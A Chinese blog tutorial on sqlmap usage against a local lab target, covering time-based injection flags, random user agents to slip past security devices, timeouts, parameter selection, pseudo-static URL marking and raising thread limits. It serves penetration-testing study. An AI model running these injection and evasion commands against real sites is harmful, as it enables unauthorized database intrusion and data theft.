SQLMAP工具之实战渗透技巧二

最新推荐文章于 2024-04-15 00:49:07 发布
最新推荐文章于 2024-04-15 00:49:07 发布
阅读量1.3k 收藏 6
点赞数 1
分类专栏: SQLMAP 文章标签: web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122808449
版权

文中通过详细讲解SQLMAP工具,更加深入的掌握SQLMAP用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

sqlmap实战渗透技巧二

时间注入参数

当我们在实战中通常会遇见网络问题或存在防护的情况,因为sqlmap默认的是所有模式的payload都会进行检测,所以需要有针对性的使用,来避免流量过大。
当SQL注入点 只允许时间注入,那么我们可以使用参数–technique:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3

在这里插入图片描述
同样可以使用多种检测方式,使用参数–technique=BUET
在图中我们可以看出使用时间注入会加入参数–time-sec(返回时间), 默认是5秒,我们可以设置这个参数的时间长短。

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --time-sec=8

在这里插入图片描述

修改请求头

在使用sqlmap测试时,在HTTP的User-Agent中会有关于sqlmap的一些信息,这样就会很容易被防护设备检测到,所以我们通常会使用随机的请求头参数–random-agent来进行检测,从而绕过部分安全设备检测:
我们可以使用-v 6来查看默认的请求头:
在这里插入图片描述
当我们使用–random-agent 来进行修改后,再来查看发现User-agent已被修改成浏览器正常的请求头:
在这里插入图片描述

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --random-agent

在这里插入图片描述

超时设置

在sqlmap中存在页面超时的时限,使用的参数是–timeout ,默认是30秒,当我们需要加强检测的效率,我们可以将这个时间缩短:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --random-agent --timeout=10

在这里插入图片描述
在sqlmap中,同样可以指定注入点的参数来进行检测,例如我们这里有name和submit这两个参数,我们就可以使用-p来指定参数:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -p name

在这里插入图片描述
可以看出name这个值是存在注入的,而我们使用submit这个值是不存在的:
在这里插入图片描述

伪静态检测

当我们没有检测到存在注入的时候,sqlmap中则会在最后提示我们是否提升等级,或者使用随机的请求头、使用一些tamper脚本等等。
当我们检测的网站使用的是伪静态,我们可以使用 * 来进行检测:

sqlmap -u "http://192.168.1.6/06/vul/sqli/id/1*.html

因为这种伪静态的是没有参数,sqlmap同样不会自行去将某一个路径作为值来检测,所以我们需要使用 * 来进行分割,像sqlmap说明次数作为一个值来进行检测是否存在注入。
在日常的检测中,有的时候我们需要提升sqlmap的检测效率,同样我们可以提升它的线程:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --batch --flush-session --threads=10

在这里插入图片描述
但这个线程最大是10,当我们使用大于10,则会报错提示:
在这里插入图片描述

线程设置

同样我们可以在sqlmap的配置文件中进行最大线程数的修改:

/usr/share/sqlmap/lib/core/settings.py  #这个路径下的配置文件来进行修改

在这里插入图片描述
修改保存后,我们就可以使用–threads=20,来进行检测:
但如果线程过高,在测试中可能会造成系统崩溃,所以尽可能的选择合适的线程来进行测试:
在这里插入图片描述

全局变量Global
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试工具sqlmap基础教程
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
红队专题-渗透工具-sqlmap
热门推荐
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
SQLMAP工具实战渗透技巧
Longwaer
02-06 1337
学习掌握SQLMAP各种小技巧,更好的在渗透测试中使用。
SQLMAP工具实战渗透技巧
Longwaer
02-08 823
学习使用SQLMAP各种小技巧,便于渗透测试中的灵活使用。
6个步骤轻松实现 postman 接口压力测试(建议收藏),2024年最新2024阿里软件测试高级面试题总结
最新发布
2401_84240431的博客
04-15 676
行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场
sfdsfgdgd的博客
04-09 751
id=1” 默认使用level1检测全部数据库类型 sqlmap -u “id=1” --dbms mysql --level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)跟随302sqlmap --follow-redirect -u 当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302, 当注入错误的时候,先报错再跳转的时候,不需要跟随302。目的就是:要追踪到错误信息。
实战技巧sqlmap不为人知的骚操作_Summer's_blog.pdf
03-19
SQLMap 是一个开源的渗透测试工具,主要用于检测和exploit SQL 注入漏洞。下面是 SQLMap 不为人知的骚操作。 1. 使用 Prefix 和 Suffix 参数 在某些环境中,需要在注入的 payload 的前面或者后面加一些字符,来...
实战渗透-看我如何拿下自己学校的大屏幕(Bypass)1
08-03
这篇实战渗透的文章主要讲述了作者如何通过自己的技巧和经验,成功地对一所学校的大屏幕管理系统进行了安全检测。文章首先介绍了作者在网络安全领域的学习经历,强调了实战经验和批量刷站的技巧。然后,通过一系列...
十三节 Sqlmap通用参数3-01
09-15
Sqlmap是一款强大的、自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。这款工具以其易用性和高效性在安全行业中备受推崇。...在后续的课程中,我们将继续深入探索Sqlmap的更多高级特性和实战技巧
sqlmap使用手册集合
06-10
2. 更新:使用内置的`sqlmap.py`脚本的`--update`选项保持工具的最新状态。 三、命令行参数 SQLMap提供了丰富的命令行参数,如: - `--url`:指定目标URL,这是最基础的参数。 - `--technique`:选择探测技术,包括...
sqlmap渗透实战进阶技巧
记录学习,一起进步
03-17 1509
sqlmap实战渗透进阶技巧
Sqlmap 简单使用
qq_31561731的博客
01-02 1332
使用工具探测出注入点后使用sqlmap注入的简单流程(傻瓜式跟着复制就可以使用): 1.sqlmap -u url --random-agent(这个探测出数据库类型) 2.sqlmap -u url --random-agent --current-db(这个探测出数据库的名字 ) 3.sqlmap -u url --random-agent -D 数据库名 -tables(枚举出数据库中的表) 4.sqlmap -u url --random-agent -D 数据库名 -T 表名 --colum
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1686
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2174
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
sql注入-08 sqlmap绕过waf
weixin_44576725的博客
11-17 3629
sqlmap绕过waf 1、绕过的方法–白名单 方式一:ip白名单 从网络层tcp、udp获取的ip,这种一般伪造不来。 如果是通过脚本获取客户端的IP,这样就可能存在伪造IP绕过的情况。 测试方法:修改http的header来bypass waf x-forwarded-for x-remote-IP x-originating-IP x-remote-addr x-Real-ip 方式:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等), 类似白名单
sqlmap的安装和使用
XL5L7的博客
04-20 3031
sqlmap安装 sqlmap安装包 链接:https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g 提取码:0wc5 sqlmap命令大全 链接:https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA 提取码:dltg 在安装sqlmap之前要先安装python环境 python安装包 链接:https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug 提取码:e0n5 安装好python环境之
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2936
sqlmap的使用方法
【网络安全 | 渗透工具SQLmap精讲(全网最详细图文教程)
等风来
01-06 1万+
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
SQLMAP绕过WAF:全面解析与实战应用
"SQLMAP是一个强大的渗透测试工具,专门用于检测和利用SQL注入漏洞。它包含了一系列绕过WAF(Web应用防火墙)的脚本,适用于多种数据库系统,如MySQL、Oracle等。通过这些脚本,渗透测试者可以在防火墙无法识别的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值